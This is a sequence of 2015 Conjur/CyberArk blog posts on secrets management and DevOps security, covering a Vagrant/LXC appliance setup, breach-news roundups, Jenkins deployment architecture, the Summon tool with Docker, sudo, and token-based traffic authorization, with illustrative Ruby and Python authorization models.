This method of standing up Conjur assumes you have Vagrant and some plugins (such as vagrant-berkshelf) installed. As soon as these prerequisites are met, it takes only three steps to get a new Conjur server up and running:

  1. Clone the public Git repo https://github.com/conjurinc/appliance-lxc
  2. Obtain from Conjur a non-public download URL for the Conjur LXC image, and export it as the environment variable INSTALLER_URL
  3. Run vagrant up with the provider of your choice (so far we’ve tested only VirtualBox and AWS, but other platforms should work with only minor modifications, using Ubuntu 12 LTS or Ubuntu 14 LTS as the base OS)

In about 10 minutes, Conjur will be set up and running inside this Vagrant-managed server (either virtual or cloud), and is ready to accept traffic after a pretty simple configuration.

Deployment architecture

Inside the server, Conjur runs as an LXC container named “conjur-appliance”:

[Diagram: vagrant-conjur]

For your convenience, the Conjur CLI and Docker are also installed on the server, so it’s immediately possible to use the CLI for learning and experimenting with Conjur. For example, all the Conjur Demos will happily run in this server environment.

This configuration unlocks many interesting options for experimenting with Conjur:

  1. Snapshotting and hard-resetting the Conjur appliance is extremely easy, because LXC containers can be backed up and restored with the lxc-clone utility.
  2. It’s possible to make a snapshot of an appliance and copy it to other server(s) as just a tarball.
  3. The server can become a test lab for HA setups, with all components deployed on the same host.
  4. Appliance upgrades can potentially be done within the same server, just by deploying a new version of the LXC container and performing a zero-downtime migration.

Turn it on

The Conjur server set up by vagrant is ‘blank’, which means it needs to be configured before it will operate.

To set up the simplest (“standalone”) version of Conjur, three parameters need to be defined:

  1. password — admin password
  2. hostname — the DNS name used by external applications to connect to Conjur
  3. account — organisational account (typically the name of a company), which is a constant serving as a prefix for all Conjur IDs

Configuration is performed by the evoke command-line utility, which is built into the Conjur container. To launch it, run vagrant ssh and then lxc-attach to the Conjur container.

BE SURE TO SET THE hostname, password, AND account VARIABLES IN YOUR SHELL ON THE SERVER!

# login to server
workstation$ vagrant ssh
# configure appliance
server$ sudo lxc-attach -n conjur-appliance -- evoke configure standalone -h $hostname -p $password $account
…<SNIPPED>...
# check the appliance availability
server$ curl -k https://conjur/api/info
{"account":"demo"}
# configure local client to use the appliance
server$ conjur init -h conjur

Now, you’re all set. Conjur logs are stored under /var/lib/lxc/conjur-appliance/rootfs/var/log/conjur.

Let the traffic flow

As seen from the commands above, within the server, Conjur is available at the short DNS names “conjur” and “conjur-appliance”, which point to the internal IP 10.0.1.2. But how can this container be exposed to the outside world?

It already is. Within the server, networking is set up so that all inbound traffic on ports 443 (ssl), 636 (ldaps) and 5432 (postgres, for replication purposes) is routed to the internal IP of Conjur LXC container.

All you have to do is let clients find the server by configuring your network appropriately (DNS and, in some cases, routing). The DNS name should match the $hostname parameter provided during configuration.

Summary

Now, Vagrant-based deployment can work equally well for local VirtualBox labs and production-level AWS setups. No specific knowledge of Vagrant or LXC is needed just to get Conjur up and running.

However, if you feel brave enough to gain some familiarity with LXC, it will definitely pay off. It’s not the goal of this post to describe all possible configurations and use cases, but the ability to run many Conjurs in the same virtual server opens a lot of opportunities for nice and elegant engineering solutions, both for experimental and production purposes.

Here are two blog posts we wrote about LXC that you might find useful:

Please do not hesitate to share your experience with us. We’re always happy to hear from you at support@conjur.net.

21 Million Social Security Numbers Leaked and Counting  https://www.cyberark.com/blog/21-million-social-security-numbers-leaked-and-counting/ Fri, 10 Jul 2015 21:03:00 +0000 https://cyberarkvx2.wpengine.com/blog/21-million-social-security-numbers-leaked-and-counting/  

Two government breaches that leaked the confidential information of millions of Americans made headlines last month. The second breach made news again this week, as the initial estimates of how many people had their information compromised turned out to be drastically too low. The Office of Personnel Management (OPM) just announced that an enormous 21 million social security numbers were jeopardized in the breach.

As is typical with any major breach, there has been a great deal of speculation as to what happened and who is to blame. Here are five interesting articles about the cyber attack. Each delivers different details and gives you varying perspectives on the incident.

  1. This article from the National Journal reports that the data breach occurred back in May 2014 and that it is being tied to China. FBI Director James Comey was among the millions of people affected. People who underwent background checks during or after the year 2000 are very likely to have been affected; however, those who had checks prior to 2000 could still be compromised.
  2. This Wall Street Journal article reveals that the hackers accessed the Standard Form 86, also called the SF-86. This form has information not only about the applicants themselves but also personal information about their family members and friends. The records that were accessed date back over 20 years.
  3. Wired reports that more than just government employees were impacted by the breach. The article states that because the hackers had been in the system for so long, we still don’t know how much information they actually accessed, something that might take a good deal of time to figure out. The article also criticizes how the government is handling the situation, outlining some key questions that must be answered going forward.
  4. This opinion piece from The Huffington Post highlights that although this breach might not be the biggest we have seen in terms of the number of people affected, it surpasses every other attack in scope and depth of information. The all-inclusive and highly sensitive nature of the personal details taken makes this breach potentially life altering for the victims.
  5. The criticisms of OPM Director Katherine Archuleta are highlighted in this article from CNN. Some of the criticisms are that she had no background in technology and that she never spoke with the Director of the FBI to discuss the investigation. The piece also points out that, prior to accepting the job, Archuleta promised, “If confirmed as director of OPM, improved management of OPM’s IT, including proper security and data management, will be one of my top priorities.” Archuleta has recently resigned.

Read a good article about the OPM breach? Leave a comment below or tweet to us @ConjurInc, we would love to hear from you! Check back next week for more info about what’s going on in the news.

Why Continuous Integration And Continuous Delivery Are Not The Same https://www.cyberark.com/blog/why-continuous-integration-and-continuous-delivery-are-not-the-same/ Wed, 08 Jul 2015 14:15:00 +0000 https://cyberarkvx2.wpengine.com/blog/why-continuous-integration-and-continuous-delivery-are-not-the-same/  

Jenkins is a powerful platform for continuous integration. As enterprises embrace high-velocity deployments enabled by DevOps, the demands on Jenkins have increased. It’s common for Jenkins to be used not just for building artifacts, but to actually deploy the artifacts to production as well. Creating artifacts is not a particularly sensitive operation, but deploying artifacts to production requires rigorous security controls. Jenkins is a tool for collaboration and visibility and is therefore not well suited to provide the restricted access required for such sensitive credentials and processes.

Many organizations have attempted to solve this problem in the following ways:

  • Running multiple Jenkins masters – each with its own set of allowed users, thus restricting who can push to production.

  • Adding Jenkins plugins – there are some very good third-party plugins focused on access control and privileges.

  • Creating a dedicated “Jenkins management” team – due to the complexity of the Jenkins ecosystem, it’s hard to rotate other team members onto the Jenkins team, which limits communication and collaboration.

Ultimately, the problem with these approaches is that they all fail to address the underlying cause of the problem: Continuous Integration and Deployment are separate concerns. When a single server is trying to perform both of these functions, many tensions arise, and they can be resolved by rethinking the proper roles and workflows.

Can you Answer the Following Questions?

  1. Which people, machines and code can deploy which applications to production?

  2. Which people, machines and code have access to the production deployment credentials?

  3. How are the access controls for #1 and #2 implemented and managed?

Knowing the answers to these questions is essential to passing a security audit or assisting in the analysis and remediation of a security incident.  The reference architecture described below will allow an organization to answer these questions and be more secure while reducing friction and increasing velocity.

[Figure: deployment server reference architecture]

As you can see from the picture above, Jenkins does not deploy directly to production; it simply adds artifacts to a repository. It has permission to trigger the release server, specifying the name and version of an artifact.

When the deployment server receives the deploy call, it first checks if the caller (person or client service) is authorized to perform the specified deploy operation.  The mechanics of this authorization check can vary according to the implementation details of the deployment server:

  • If the Deployment Server exposes the deploy capability via a set of shell scripts, then the Deployment Server should validate that the SSH key presented is trusted and map the identity of the caller to a user in the underlying operating system. Along with the OS user comes a list of groups and sudoers permissions. OS permissions can be used to enforce who can run the script.

  • If the Deployment Server exposes the deploy capability via a set of Web Services, then the Deployment Server can be protected by a traffic authorization gatekeeper.  The gatekeeper only allows authorized clients to invoke the deploy service.

Once the request is authorized, the deployment server retrieves the artifact and the deployment credentials (from a Secrets Server). Of course, the Secrets Server also performs an authorization check to ensure that the Deployment Server is authorized to access the specified credentials. Finally, using those credentials, the Deployment Server pushes the tested package into the designated environment (test, stage, production, etc.).
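The authorization chain just described, as an added Ruby model (not a Conjur component and not any real deployment server): Jenkins only builds into the artifact repository and triggers the deployment server by artifact name and version; the deployment server checks the caller against a deploy policy, then asks the secrets server for the deployment credential; the secrets server checks the deployment server’s own identity before releasing it. Every decision lands in an audit list, so the three questions above can be answered from it. The class names, identities, policy table and secret ids are constructed for the example.

```ruby
# Append-only audit trail; every authorization decision is recorded here.
AUDIT = []

class AccessDenied < StandardError; end

# Record a decision and return it, so callers can use it directly as a guard.
def audit(who, action, target, allowed)
  AUDIT << { who: who, action: action, target: target, result: allowed ? :allowed : :denied }
  allowed
end

# Secrets server: stores deployment credentials and releases one only to an
# identity that has been granted read access to it.
class SecretsServer
  def initialize
    @values = {}
    @readers = Hash.new { |h, k| h[k] = [] } # secret id => identities allowed to read it
  end

  def store(id, value, readers:)
    @values[id] = value
    @readers[id].concat(readers)
  end

  # Answers question 2: who has access to this credential?
  def who_can_read(id)
    @readers[id].dup
  end

  def fetch(client, id)
    allowed = audit(client, 'secret:read', id, @readers[id].include?(client))
    raise AccessDenied, "#{client} may not read #{id}" unless allowed
    @values.fetch(id)
  end
end

# Deployment server: the only component that ever touches deployment
# credentials. It authorizes the caller first, then fetches artifact and key.
class DeploymentServer
  IDENTITY = 'deployment-server'

  # policy: caller identity => { app => [environments it may deploy to] }
  def initialize(repo, secrets, policy)
    @repo, @secrets, @policy = repo, secrets, policy
  end

  # Answers question 1: who can deploy this app to this environment?
  def who_can_deploy(app, env)
    @policy.select { |_, apps| apps.fetch(app, []).include?(env) }.keys
  end

  def deploy(caller, app, version, env)
    allowed = audit(caller, 'deploy', "#{app}:#{version}->#{env}", who_can_deploy(app, env).include?(caller))
    raise AccessDenied, "#{caller} may not deploy #{app} to #{env}" unless allowed
    artifact = @repo.fetch("#{app}:#{version}") # KeyError: only built artifacts can be deployed
    key = @secrets.fetch(IDENTITY, "#{env}/#{app}/deploy-key")
    push(artifact, env, key)
  end

  private

  # Stand-in for the real push: returns a receipt instead of touching hosts.
  def push(artifact, env, key)
    { env: env, artifact: artifact, credential_used: "#{key[0, 4]}..." }
  end
end

# Jenkins: builds into the repository and triggers deploys by name and
# version; it holds no deployment credentials and no production access.
class Jenkins
  def initialize(repo, deployer)
    @repo, @deployer = repo, deployer
  end

  def build(app, version)
    @repo["#{app}:#{version}"] = "#{app}-#{version}.tar.gz"
  end

  def trigger(app, version, env)
    @deployer.deploy('jenkins', app, version, env)
  end
end

# Wire up the constructed demo: Jenkins may deploy only to test; a human
# release manager may deploy to every environment. Secret values are samples.
def build_demo
  repo = {}
  secrets = SecretsServer.new
  %w[test stage production].each do |env|
    secrets.store("#{env}/webapp/deploy-key", "constructed-#{env}-key", readers: [DeploymentServer::IDENTITY])
  end
  policy = {
    'jenkins'         => { 'webapp' => %w[test] },
    'release-manager' => { 'webapp' => %w[test stage production] }
  }
  deployer = DeploymentServer.new(repo, secrets, policy)
  [Jenkins.new(repo, deployer), deployer, secrets]
end

if $PROGRAM_NAME == __FILE__
  jenkins, deployer, _secrets = build_demo
  jenkins.build('webapp', '1.2.3')
  p jenkins.trigger('webapp', '1.2.3', 'test')
  p deployer.who_can_deploy('webapp', 'production') # ["release-manager"]
  p AUDIT.last
end
```

Question 3 is answered by the shape of the code rather than by a query: the deploy policy lives in the deployment server and the read grants live in the secrets server, and both are plain data that can be versioned and reviewed, which is what makes the audit trail meaningful.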

Conclusion

By taking a step back and looking at the root cause of the problem – using Jenkins for more than just Continuous Integration – and adopting the reference architecture above, enterprises can eliminate this bottleneck in their deployment pipeline, be more secure, and ultimately be more responsive to the needs of the business. At Conjur, we help organizations solve this problem through our 5-step “Continuous Secrets Delivery” process. You can see it for yourself by clicking below.

Improve Your Docker Workflow with Summon https://www.cyberark.com/blog/improve-your-docker-workflow-with-summon/ Mon, 06 Jul 2015 16:59:00 +0000 https://cyberarkvx2.wpengine.com/blog/improve-your-docker-workflow-with-summon/  

In June we released Summon, an open-source tool to make it easier to use secrets in modern workflows. As part of the release, we proposed secrets.yml, a format that allows you to check references to secrets into source control. In this post I’ll talk about why this matters and show you how you can improve and secure your Docker workflow with Summon.

Secrets are dependencies

Here is Gene Kim talking about the results from the 2014 State of DevOps survey:

“One of the most startling findings this year studying over 9,200 survey responses was that version control was consistently one of the highest predictors of performance. And furthermore, that version controlling the production environment was an even higher predictor of performance than version controlling code!”

So, if you want a chance at being a high-performance IT organization, everything you need to recreate your production environment should be in source control. You write your server configurations as code with config management tools, write or generate code for database migrations, networks are now exporting RESTful APIs for programmatic control, etc. DevOps is pushing “everything as code” to great success.

Security is working hard to keep up and maintain visibility. We are working on open-source tools at Conjur to help. The first, Summon, aims to tackle the issue of secrets and source control. Your applications need passwords, API tokens, SSL certificates – but you can’t check them in. They end up in a fugue state, wandering around your infrastructure and developer laptops. The engineers that need credentials waste time hunting them down and auditors are not impressed. Unlike PII or PCI data, there is no standard for securing secrets today. Checking encrypted secrets into source control only means that you have new secrets – the keys you need for decryption.

Secrets are dependencies. We should track them in source control. Here’s a fun game – at your next dev meeting, suggest that you stop checking your application dependencies into source control. No more requirements.txt, Gemfile or composer.json. Talk through how removing these files would impact your release cycle. Our proposal is that you use Summon + secrets.yml to track your secrets in source control.

Using Docker with Summon

To use Docker effectively, it’s best to treat your containers as 12-factor applications that receive their configuration via the environment. That way, you can move containers between environments as immutable artifacts. Some of the configuration that changes between environments will be sensitive credentials – “when I’m running in production I need the production database password”.

In this hands-on example, we walk through a deploy script running inside a Docker container. Summon provides the credentials, using your OS’s keychain as the secrets store.

Winston Churchill, Security, and DevOps https://www.cyberark.com/blog/winston-churchill-security-and-devops/ Thu, 02 Jul 2015 20:17:00 +0000 https://cyberarkvx2.wpengine.com/blog/winston-churchill-security-and-devops/  

At Conjur, we love Winston Churchill — not just for his seemingly inexhaustible supply of relevant quotations, but also because he was such a fan of afternoon naps. Mr. Churchill, of course, led Britain through World War II – holding the nation together with limited resources, amidst a very threatening landscape.

Many security leaders can relate to this, with their organizations facing tangible external threats, ever-stricter compliance requirements, and incessant demand from the line-of-business for faster delivery of applications. It’s this last requirement that has driven many organizations to adopt DevOps – also known as continuous deployment – to accelerate application delivery and business value through collaboration, communication and automation between development, the business, and IT.


From a security perspective, DevOps is often perceived as, to misquote our friend Mr. Churchill – “a riddle, wrapped in a mystery, inside an enigma.” Why is this the case? Don’t security teams generally have a good grasp of their organization’s production environment? Aren’t security architects typically involved in application design and development processes?

Not having good visibility into the security of the DevOps tool chain and infrastructure is unacceptable to the security team, as it introduces tremendous compliance and security risk. At the same time, for most organizations that adopt it, DevOps brings tremendous business and technology benefits. The right answer, of course, is for Security to embrace DevOps, and help the organization safely and securely execute it.

DevOps, at its heart, requires intense collaboration and communication between development, IT, and the business. InfoSec needs to be part of this collaboration, to influence and define the tools, processes, and policies that are expressed by a DevOps initiative. This is a worthwhile and interesting initiative – but it’s not always an easy one. In support of this, we’ve created a simple blueprint here, “Security At Scale”.


Organized into 6 actionable steps, this guide provides concrete recommendations for how your security team can properly engage with and support your organization’s DevOps initiative.

Winston Churchill did not work in technology, but he clearly understood the need for security, and knew how to lead. Your team can lead the way toward a more secure and robust DevOps initiative – and the six steps in this blueprint are a great way to begin.

What’s Next After The LastPass Breach? https://www.cyberark.com/blog/whats-next-after-the-lastpass-breach/ Thu, 25 Jun 2015 14:52:00 +0000 https://cyberarkvx2.wpengine.com/blog/whats-next-after-the-lastpass-breach/  

No doubt you’ve already heard about the recent security hack at LastPass. In what is an all-too-common trend, even among security-minded organizations, hackers are finding new ways to gain access to privileged information on a regular basis. While LastPass has confirmed that their security was adequate enough that no actual customer passwords were compromised, it still leaves an unsettling feeling.


The main issue isn’t even that another hack occurred, but rather that it is happening to supposedly ‘security-centric’ companies. So it raises the question, how secure is “secure enough” in today’s world? Here are some interesting opinions on this topic that we hope will help you evaluate your own situation:

CBS MoneyWatch asks the question, ‘How secure are password managers?’ The article weighs the benefits of putting all of your password trust in one basket against diversifying your password management, while advocating for the use of two-factor authentication.

The Cointelegraph wonders if it is finally time for passwordless logins.  The article focuses on the cryptocurrency world and how the recent development of Secure Quick Reliable Login (SQRL) as well as public key cryptography could improve security without the need of passwords.

SecureIDNews tells us not to sweat the LastPass breach. A consultant interviewed for the article suggests that services like LastPass were specifically designed to remain secure in the event of a breach such as this.

ITBusinessEdge points out that this is LastPass’ third breach since 2011.  They also bring to light that one still needs an unencrypted master password to log into the service and that this password is still an easy target for hackers.

With any breach there will be varying opinions on how best to avoid becoming the next victim of cyber hacking. While proper password management, two-factor authentication and services like LastPass significantly decrease the likelihood of a breach, they certainly don’t eliminate it. Properly instituting a zero-trust security architecture can dramatically improve your organization’s overall ability to remain secure as you grow and the techniques used against you improve.

How To Securely Share Your Private Docker Registry With External Clients and Partners https://www.cyberark.com/blog/how-to-securely-share-your-private-docker-registry-with-external-clients-and-partners/ Tue, 23 Jun 2015 20:44:00 +0000 https://cyberarkvx2.wpengine.com/blog/how-to-securely-share-your-private-docker-registry-with-external-clients-and-partners/  

Today Docker announced their new “Trusted Registry”, which is a commercial version of the open-source Docker Registry image storage and distribution service. Teams can run a Trusted Registry to control how their images are physically stored and enhance their ability to fully own their image distribution pipeline.

Docker Trusted Registry integrates with AD/LDAP, so that access to the registry is controlled based on your Enterprise directory.  It’s an important step forward for container security.

But, there’s much more that can be done to make Docker Registry useful in an Enterprise environment. For workflows involving programmatic access, and Registry access from beyond the enterprise “perimeter”, Active Directory as a “source of truth” isn’t enough.

What’s needed is true “zero-trust” authentication and authorization that is production ready; granular management of access to the Docker Registry that goes beyond human access, beyond the firewall, and beyond username/password authentication.

Why should Conjur’s programmable traffic authorization platform be used to manage the Docker Registry?  Simply put, it is a stronger, more holistic approach to managing access controls.  Incoming traffic is authenticated and authorized according to user or host (machine, VM, container, code) credentials and customizable privileges via declarative, auditable policy. The resulting audit trail provides a comprehensive record of who and what has accessed the registry.

The recommended architecture for securing the Docker Registry:

[Figure: docker-registry-sdf]

It’s a secure, token-based scheme which applies “zero trust” security to your Docker Registry, enabling you to grant access to all types of clients without the need to configure and manage VPNs and security groups.  We have written a detailed step-by-step guide in GitHub that will show you how to apply Conjur to your Docker Registry.

https://github.com/conjurinc/docker-registry/blob/master/README.md

This example requires Conjur to operate; but we are working on an open-source service for federated authorization that will enable anyone to apply this reference architecture. [To see how we approach problems like this, check out our open-source project Summon, which reads a secrets.yml file from source control, obtains secrets, and injects them into arbitrary processes like docker run.]

You can also find more details about how Conjur can help secure Docker containers at runtime in our recent blog post Securing Docker With Secrets and Dynamic Traffic Authorization.

As always, we welcome your feedback! Find us on Twitter at @ConjurInc.

To Sudo or Not to Sudo? That is the Question https://www.cyberark.com/blog/to-sudo-or-not-to-sudo-that-is-the-question/ Tue, 23 Jun 2015 15:38:47 +0000 https://www.cyberark.com/blog//

It’s no secret that unsecured privileged accounts represent one of the largest security vulnerabilities today. In the hands of an external cyber attacker or malicious insider, privileged accounts allow attackers to take full control of an organization’s IT infrastructure, disable security controls, steal confidential information, commit fraud and disrupt operations.

One major challenge with managing privileged accounts is that while many IT professionals need privileged access to do their jobs, they don’t need access to the entire network (or to all commands or programs that could be executed). That’s where the principle of least privilege comes in, which dictates that people should only have access to the resources and information necessary for their job function.

One way to enforce this is the free, open source solution called sudo (superuser do). This allows Unix users to access and authenticate to a system with a personal account and escalate privileges to superuser or root to run privileged commands. Sudo can be configured to blacklist or whitelist specific commands for each user. It can also help beef up IT infrastructure security by limiting root access on Unix machines. Sounds great, right? Not so fast. As with everything in life, you get what you pay for.

Organizations looking to enforce least privilege policies often begin by asking “to sudo or not to sudo?” To help you make more informed decisions about whether sudo is the right answer to that question, we’ve published a new security brief outlining five things to consider, including:

  • How secure is sudo? It may not be as secure as you think
  • Need to achieve compliance? Three challenges you’ll likely run into
  • Planning on organizational changes? Think ahead, because sudo won’t scale
  • Can you trust sudo? Questionable reliability often leads to other issues that introduce risk
  • Looking for an alternative to sudo? CyberArk offers a more secure, scalable and reliable alternative for organizations looking to enforce least privilege policies

You can download this free security brief here: https://www.cyberark.com/resource/to-sudo-or-not-to-sudo-that-is-the-question/.

While sudo can be an attractive solution with no acquisition cost, ultimately many organizations realize the hard way that “free” can actually end up costing them a great deal. So before you make the call, make sure you’ve weighed the pros and cons and explored other alternatives that can deliver a higher level of security, scalability and reliability.

Securing Docker With Secrets and Dynamic Traffic Authorization https://www.cyberark.com/blog/securing-docker-with-secrets-and-dynamic-traffic-authorization/ Thu, 18 Jun 2015 19:04:00 +0000 https://cyberarkvx2.wpengine.com/blog/securing-docker-with-secrets-and-dynamic-traffic-authorization/  

Here at Conjur, we’ve been caught up in the Docker wave like so many of you. The biggest question our users face is: how can Docker be effectively deployed and secured in production, by mid-size and large enterprises?

As we’ve worked with our customers on this problem over the last year or so, we’ve been deeply interested in finding effective security orchestration patterns for Docker which work for many different types of organizations and application architectures. In this post we will summarize several of these patterns, which we hope you’ll find useful.

Secrets

In 2012, Adam Wiggins and his collaborators formulated an excellent set of guidelines for architecting PaaS and container-style applications. These guidelines were formalized as the “12 Factor App”; you can read about them at http://12factor.net/. These guidelines apply very well to Docker containers and images, and studying each one is a valuable exercise for any developer or architect who’s using Docker.

Factor number three states: “Store config in the environment”, and it mandates “strict separation of config from code”. From a security standpoint, the implication is that secrets (SSL certs, database passwords, etc.) must be provided to the container through environment variables. Baking secrets into images is an insecure practice which must be avoided.

In response, we’ve developed a fully open-source tool called “Summon” (https://github.com/cyberark/summon/). To quote the Readme:

“Summon is a command-line tool that reads a file in secrets.yml format and injects secrets as environment variables into any process. Once the process exits, the secrets are gone.”

[Figure: summon-diagram-1]

Summon provides several clear benefits for orchestrating secrets into Docker:

  • Secrets are referenced in secrets.yml, a file which is safe to check into source control.

  • Secrets are provided at runtime by a secrets “provider”; thus, the security orchestration is decoupled from the actual provider of the secrets.

  • Summon ensures that secrets are handled according to security best practices; they are never on disk (temp files go to /dev/shm) and they are removed when the managed process (“docker run”) exits.

For example, to provide a database password to a Docker container, you’d create a secrets.yml file which looks like this:

DB_PASSWORD: !var prod/db/password

Then launch the Docker container using the following command:

$ summon docker run -e DB_PASSWORD myapp

Traffic Authorization

In any service-oriented architecture, it’s important to securely govern the allowable communication between the various applications and services. And it’s also important to provide a secure way for key personnel (developers and operations) to interact directly with applications and services when necessary.

This traffic management problem is known by quite a few different names; we generally call it “software-defined firewall” or “identity-defined firewall”.

Traditionally, a few different approaches have been used.

  1. All the services are deployed within an enterprise perimeter. Very little additional security is applied to the traffic. This is a hazardous way to operate, and it’s useless in a cloud or hybrid architecture.

  2. Software-defined networking (e.g. AWS Security Groups) is used to govern allowable inbound and outbound traffic. This method is effective; however, it’s difficult to manage, and management tools like the AWS Console present a constant threat that security will be accidentally loosened when people (or code) relax the traffic rules for their own purposes. It’s also hard to interact with these systems from outside the cloud environment, and the security of the application becomes tied to the cloud vendor.

  3. Methods like PKI (SSL mutual auth) or Kerberos govern the traffic. These techniques are hard to manage, and have limitations of their own. For example, fine-grained authorization is not a strength of PKI, and it’s hard to make Kerberos reliable across multi-site (e.g. hybrid cloud and multi-region) deployments. They are also hard to interact with manually (e.g. via cURL, for maintenance and one-off tasks).

A Docker container cluster like Mesos or Kubernetes presents another particular challenge: software-defined networking and security groups cannot be used to gate the traffic, because there are no fixed boundaries between the containers and container groups (“pods”, in Kubernetes parlance).

For regulating HTTP(S) traffic, we advocate for a particular technique involving a Forwarder, Gatekeeper, and Token Broker. It works like this:

  • Each container “pod” (aka “multi-container application”) runs a Gatekeeper container, which intercepts all inbound HTTP(S) traffic and verifies the authenticity of a token which it finds in the Authorization header.

  • The Forwarder is a container which intercepts all outbound traffic and places the token on the Authorization header.

  • The tokens are issued and verified by the Token Broker.

  • Token verification can be cached, so that the latency and throughput of the cluster is minimally impacted.


The Forwarder and Gatekeeper are each implemented using Nginx with standard configuration directives plus a bit of Lua scripting. The Forwarder authenticates itself to the Token Broker using a shared secret, which can be provided by Summon. The result is a system with very clear security properties. It’s also easy to manage, it works with any deployment architecture, and it works equally well inside a defined perimeter, or across wide geographic boundaries. In addition, it’s easy for humans to interact with the system; they can run a local Forwarder on their laptop which operates just like the Forwarders in the container pods.

You can see examples of Forwarder and Gatekeeper Nginx configuration in our “sdf-gen” project.
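
As an added illustration (not the sdf-gen Nginx/Lua configuration, and not Conjur’s code), the following constructed Python model walks the exchange described above: a Forwarder authenticates to the Token Broker with its shared secret and places the issued token on the Authorization header, and the Gatekeeper verifies the token through the Broker, caching verdicts until the token expires, before applying the pod’s caller allow-list. The token format, TTL, service names and shared secrets are all assumptions made for the example.

```python
import base64
import hashlib
import hmac
import json
import secrets as pysecrets


class TokenBroker:
    """Issues HMAC-SHA256 signed claim tokens to authenticated Forwarders and verifies them."""

    def __init__(self, forwarder_secrets, ttl_seconds=300):
        self._forwarder_secrets = forwarder_secrets  # service -> shared secret (e.g. via Summon)
        self._signing_key = pysecrets.token_bytes(32)  # never leaves the Broker
        self.ttl = ttl_seconds
        self.verify_calls = 0  # counted only to show Gatekeeper caching

    def issue(self, service, shared_secret, now):
        expected = self._forwarder_secrets.get(service)
        if expected is None or not hmac.compare_digest(expected, shared_secret):
            raise PermissionError(f"forwarder authentication failed: {service}")
        body = json.dumps({"sub": service, "exp": now + self.ttl}).encode()
        sig = hmac.new(self._signing_key, body, hashlib.sha256).digest()
        return base64.b64encode(body).decode() + "." + base64.b64encode(sig).decode()

    def verify(self, token, now):
        """Return the claims of a correctly signed, unexpired token, else None."""
        self.verify_calls += 1
        try:
            body_b64, sig_b64 = token.split(".")
            body, sig = base64.b64decode(body_b64), base64.b64decode(sig_b64)
        except ValueError:  # malformed token (binascii.Error is a ValueError)
            return None
        expected = hmac.new(self._signing_key, body, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, sig):
            return None
        claims = json.loads(body)
        return claims if claims["exp"] > now else None


class Forwarder:
    """Outbound side: fetches a token (renewing on expiry) and puts it on the Authorization header."""

    def __init__(self, broker, service, shared_secret):
        self._broker, self._service, self._secret = broker, service, shared_secret
        self._token, self._exp = None, 0

    def outbound(self, headers, now):
        if self._token is None or self._exp <= now:
            self._token = self._broker.issue(self._service, self._secret, now)
            self._exp = now + self._broker.ttl
        return {**headers, "Authorization": "Token " + self._token}


class Gatekeeper:
    """Inbound side: verifies via the Broker (cached until token expiry), then applies the allow-list."""

    def __init__(self, broker, allowed_callers):
        self._broker = broker
        self._allowed = set(allowed_callers)
        self._cache = {}  # token -> claims (reusable until claims["exp"])

    def admit(self, headers, now):
        """Return (status, caller): 401 bad/missing token, 403 caller not allowed, 200 ok."""
        auth = headers.get("Authorization", "")
        if not auth.startswith("Token "):
            return 401, None
        token = auth[len("Token "):]
        claims = self._cache.get(token)
        if claims is None or claims["exp"] <= now:
            claims = self._broker.verify(token, now)
            if claims is None:
                self._cache.pop(token, None)
                return 401, None
            self._cache[token] = claims
        caller = claims["sub"]
        return (200, caller) if caller in self._allowed else (403, caller)


def demo():
    """Walk the exchange with constructed services, secrets and a fixed clock."""
    broker = TokenBroker({"web": "web-shared-secret", "batch": "batch-shared-secret"})
    api_gate = Gatekeeper(broker, allowed_callers={"web"})  # only "web" may call "api"
    web = Forwarder(broker, "web", "web-shared-secret")
    batch = Forwarder(broker, "batch", "batch-shared-secret")
    t0, r = 1_000_000, {}
    first = web.outbound({"Host": "api"}, t0)
    r["web_first"] = api_gate.admit(first, t0)
    r["web_second"] = api_gate.admit(web.outbound({"Host": "api"}, t0 + 1), t0 + 1)
    r["verify_calls_after_two"] = broker.verify_calls  # second request hit the cache
    r["batch"] = api_gate.admit(batch.outbound({"Host": "api"}, t0), t0)
    forged = first["Authorization"].split(".")[0] + "." + base64.b64encode(b"\0" * 32).decode()
    r["forged_sig"] = api_gate.admit({"Authorization": forged}, t0)
    r["expired"] = api_gate.admit(first, t0 + broker.ttl + 1)  # stale token re-presented
    r["renewed"] = api_gate.admit(web.outbound({}, t0 + broker.ttl + 1), t0 + broker.ttl + 1)
    try:
        Forwarder(broker, "web", "wrong-secret").outbound({}, t0)
        r["bad_secret"] = "issued"
    except PermissionError:
        r["bad_secret"] = "refused"
    return r
```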

Summary

While the Docker engine has been officially released and stable for about a year, the practices and tooling surrounding Docker deployment and orchestration are still very much in flux. We believe that solid patterns and practices for deploying secrets and managing HTTP(S) traffic between containers can help to accelerate Docker’s enterprise adoption. These patterns need to be tool-independent and “future-proof”, so that Docker orchestration tooling and application architectures can continue to evolve without breaking security. In addition, they should be written as open standards or open source, so that any team can feel comfortable adopting and using them. We are looking forward to working with you to design and develop this new generation of security APIs and tools!

Using Puppet With A Secrets Server https://www.cyberark.com/blog/using-puppet-with-a-secrets-server/ Thu, 18 Jun 2015 13:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/using-puppet-with-a-secrets-server/  

We are delighted to announce that our CTO Kevin Gilpin will be presenting at PuppetConf in Portland, Oregon this October. During his 45-minute session, Using Puppet with a Secrets Server, Kevin will discuss the many important advantages of using a secrets server instead of storing secrets in configuration management.


From a security standpoint, secrets servers speed up the path to compliance while offering:

  • end-to-end encryption;
  • access control;
  • detailed auditing of access;
  • purpose-built APIs;
  • dedicated management and reporting tools;
  • support for auto-scaling deployment architectures.

You can take a look at the details of his talk here!

Sounds great, right? Don’t worry, if you haven’t already, there is still time to register for PuppetConf. Kevin will be presenting on Thursday October 8 at 4:45pm in Oregon Ballroom 202! You won’t want to miss his informative session.

Have any questions for Kevin about his talk? Tweet to him @Kegilpin or @ConjurInc. 

Security Maps For The New Container World [SLIDESHARE] https://www.cyberark.com/blog/security-maps-for-the-new-container-world-slideshare/ Wed, 17 Jun 2015 18:38:00 +0000 https://cyberarkvx2.wpengine.com/blog/security-maps-for-the-new-container-world-slideshare/  

Conjur’s own Josh Bregman recently had the amazing opportunity to present at this year’s QCon New York conference.  What is QCon New York you may ask?

According to their website, “QCon empowers software development by facilitating the spread of knowledge and innovation in the developer community.  A practitioner-driven conference, QCon is designed for technical team leads, architects, engineering directors, and project managers who influence innovation in their teams.”

This vision clearly aligns with our own so thanks again to the QCon community for the opportunity to share some knowledge!  In fact, Josh’s presentation discusses best practices around:

  • Tips on Operating Docker Securely
  • How to Embed Security As a Service
  • Using Software Defined Firewalls for Container Security
  • Reference Architecture for Security Orchestration
  • Continuous Secrets Delivery

